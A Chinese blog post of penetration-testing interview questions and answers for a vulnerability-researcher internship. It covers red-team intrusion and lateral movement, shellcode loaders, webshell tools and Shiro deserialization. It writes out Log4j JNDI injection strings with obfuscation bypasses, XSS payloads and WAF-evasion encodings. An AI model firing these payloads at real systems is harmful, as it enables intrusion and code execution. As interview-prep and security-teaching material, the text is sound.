2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

深信服-漏洞研究员实习

[1. 在XX实习时做了什么](#1. 在XX实习时做了什么)

[2. 渗透测试的思路简单描述](#2. 渗透测试的思路简单描述)

[3. 护网中承担什么角色](#3. 护网中承担什么角色)

[4. 红队一些攻击思路](#4. 红队一些攻击思路)

[5. 拿下系统如何横向](#5. 拿下系统如何横向)

[6. Log4j漏洞(CVE-2021-44228)研究](#6. Log4j漏洞(CVE-2021-44228)研究)

[7. 内存码(Shellcode Loader)了解](#7. 内存码(Shellcode Loader)了解)

[8. 冰蝎、哥斯拉工具分析](#8. 冰蝎、哥斯拉工具分析)

[9. 攻击队研究重点](#9. 攻击队研究重点)

[10. 擅长漏洞/攻击方向](#10. 擅长漏洞/攻击方向)

[11. Shiro反序列化漏洞解析](#11. Shiro反序列化漏洞解析)

[12. Bypass方法示例](#12. Bypass方法示例)


深某服-漏洞研究员实习

在XX实习时做了什么

渗透测试的思路简单描述

护网中承担什么角色

红队一些攻击思路

拿下系统如何横向

前段时间的那个log4j有研究吗,可以简单说一下吗

(接上)有哪些混淆绕过的方法

内存码有没有了解

冰蝎、哥斯拉这些工具有没有了解过

做攻击队的时候有没有研究过什么攻击,比如研究一些工具还是魔改什么的

那么多漏洞和攻击,比较擅长哪一个

说下shiro反序列化的形成原因、利用链

对一些bypass的方法有没有了解过,什么姿势可以简单介绍一下。

1. 在XX实习时做了什么

在实习期间,主要围绕渗透测试、漏洞挖掘和攻防实战展开:

  • 渗透测试项目:参与内/外部资产的安全评估,包括Web应用、API接口和内部系统的漏洞扫描(如SQL注入、XSS、逻辑漏洞等)。
  • 漏洞挖掘与利用:针对Java框架(Shiro、Fastjson)、中间件(WebLogic、Tomcat)进行代码审计,复现历史漏洞并尝试发现新攻击面。
  • 红蓝对抗支持:协助防守方分析攻击流量,溯源攻击链;同时模拟攻击队编写PoC工具,绕过WAF规则。
  • 报告输出:整理漏洞复现步骤、风险等级和修复方案,推动开发团队修复高危漏洞。

2. 渗透测试的思路简单描述

渗透测试核心流程分五阶段:

  1. 信息收集
    • 子域名枚举(如subfinder)、端口扫描(nmap)、指纹识别(Wappalyzer)。
    • 敏感信息泄露(GitHub源码、备份文件、配置文件)。
  2. 漏洞扫描与验证
    • 工具自动化扫描(AWVS、Nessus),结合手动验证误报(如逻辑漏洞、未授权访问)。
  3. 权限提升
    • 通过弱口令、反序列化、文件上传等漏洞获取初始立足点。
  4. 横向移动
    • 利用内网协议(SMB、WinRM)、凭证窃取(Mimikatz)扩大控制范围。
  5. 报告输出
    • 输出漏洞详情、攻击路径图及修复建议。

3. 护网中承担什么角色

  • 攻击队角色
    • 突破入口:针对暴露面(Web应用、VPN、邮件系统)进行漏洞利用(如Log4j、OA系统RCE)。
    • 横向渗透:通过内网代理(如reGeorg)和口令爆破(Hydra)拿下域控或核心数据库。
  • 防守经验
    • 分析攻击流量特征(如冰蝎流量加密),优化WAF规则;
    • 协助处置应急事件(如Webshell查杀、日志溯源)。

4. 红队一些攻击思路

初始入侵阶段

  • 鱼叉攻击:钓鱼邮件投递恶意文档(CVE-2021-40444)或伪装升级包(供应链污染)。
  • 0day/Nday利用:针对未修复的高危漏洞快速突破(如Confluence RCE)。

横向扩展阶段

  • 凭证窃取:通过Mimikatz提取内存密码、Kerberoasting攻击获取服务账户哈希。
  • 权限维持:部署隐蔽后门(如计划任务、WMI事件订阅)、黄金票据伪造域管权限。

5. 拿下系统如何横向

横向移动关键步骤:

  1. 信息收集
    • 内网资产扫描(Netsparker、Fscan),定位高价值目标(数据库、域控)。
  2. 凭证利用
    • Pass-the-Hash(NTLM哈希传递)、Pass-the-Ticket(Kerberos票据转发)。
  3. 协议漏洞
    • 利用SMBGhost(CVE-2020-0796)、Zerologon(CVE-2020-1472)直接提权。
  4. 隐蔽通道
    • 通过DNS隧道(dnscat2)、HTTP代理(Chisel)绕过网络隔离。

6. Log4j漏洞(CVE-2021-44228)研究

原理 :Log4j 2.x版本解析日志时,未对${jndi:ldap://xxx}等表达式过滤,导致JNDI注入,远程加载恶意类触发RCE。

混淆绕过方法

  • 环境变量注入${${env:XXX:-j}ndi:ldap://xxx}(利用默认值覆盖)。
  • Lower/Upper关键字${jNdi:ldap://xxx}(大小写绕过)。
  • 嵌套表达式${${::-j}ndi:ldap://xxx}(特殊符号替换)。
  • 绕过高版本限制 :利用上下文变量(如${ctx:xxx})拼接攻击载荷。

7. 内存码(Shellcode Loader)了解

  • 原理:将恶意代码(如Cobalt Strike的Beacon)直接加载到内存中执行,避免文件落地。
  • 常见技术
    • 反射型DLL注入 :通过VirtualAlloc分配内存并执行。
    • 进程镂空(Process Hollowing):替换合法进程内存内容(如svchost.exe )。
  • 对抗检测:通过加密壳(如AES)、API调用混淆(如Syscall直接调用)绕过EDR。

8. 冰蝎、哥斯拉工具分析

  • 冰蝎(Behinder)
    • 特点:动态密钥加密流量(AES+随机Key),支持HTTP/HTTPS隧道。
    • 检测难点 :特征为固定UA头Content-Type: application/octet-stream
  • 哥斯拉(Godzilla)
    • 优势:支持更多加密算法(如RSA)、模块化功能(内网穿透、端口扫描)。
    • 绕过技巧:修改默认密钥、自定义HTTP头字段混淆流量。

9. 攻击队研究重点

  • 工具武器化
    • 魔改C2框架(如Cobalt Strike Aggressor脚本),适配目标环境。
    • 开发轻量级漏洞利用工具(如Fastjson一键利用)。
  • 流量混淆
    • 对Webshell流量进行分段编码(如Base64+Hex混合)、添加垃圾数据。
  • 供应链攻击
    • 研究第三方组件漏洞(如npm包、Docker镜像投毒)。

10. 擅长漏洞/攻击方向

反序列化漏洞

  • 擅长点:Java反序列化链构造(如CommonsBeanutils、CC链)、内存马注入。
  • 实战案例:通过Shiro RememberMe字段反序列化打入内网,结合JNDI注入加载内存马。

11. Shiro反序列化漏洞解析

形成原因

  • Shiro使用硬编码AES密钥加密RememberMe字段,攻击者通过伪造Cookie触发反序列化。
  • 反序列化入口点:AbstractRememberMeManager#decrypt方法。

利用链(以CommonsBeanutils为例)

  1. 触发点 :恶意Cookie → AES解密 → 反序列化 → 调用BeanComparator.compare()
  2. 利用链 :通过PropertyUtils.getProperty() 触发任意Getter方法,最终执行TemplatesImpl加载字节码。

12. Bypass方法示例

常见绕过姿势

  • 编码混淆 :URL编码、Unicode转义(如<img src=x onerror=alert(1)>\u003cimg\u0020src=x...)。
  • 关键字分割 :利用注释符或拼接(如<svg/onload=alert``(1)>)。
  • 协议特性
    • HTTP参数污染(HPP):param=1&param=payload触发解析差异。
    • 特殊符号:${1+1}在Thymeleaf等模板引擎中执行表达式。
相关推荐
23zhgjx-zgx7 分钟前
OSPF:虚链路
网络·tcp/ip·华为·智能路由器·ensp
lovebugs31 分钟前
Java并发编程之Lock机制:更灵活的线程同步方案
后端·面试
咩咩觉主41 分钟前
Unity网络开发基础 (2) 网络协议基础
网络·unity·c#
Nicole Potter44 分钟前
内存泄漏出现的时机和原因,如何避免?
c++·游戏·面试·c#
liujingtech2 小时前
Android如何让属性动画更加优雅与生命周期绑定
面试
嵌入式悦翔园3 小时前
嵌入式设备的功能安全和信息安全?
网络·安全·php
Huooya4 小时前
springboot的外部配置加载顺序
spring boot·面试·架构
喝养乐多长不高4 小时前
HTTPS加密原理详解
网络·网络协议·http·https·证书·非对称加密·对称加密
钢板兽4 小时前
Java后端高频面经——Spring、SpringBoot、MyBatis
java·开发语言·spring boot·spring·面试·mybatis
钢板兽4 小时前
Java后端高频面经——JVM、Linux、Git、Docker
java·linux·jvm·git·后端·docker·面试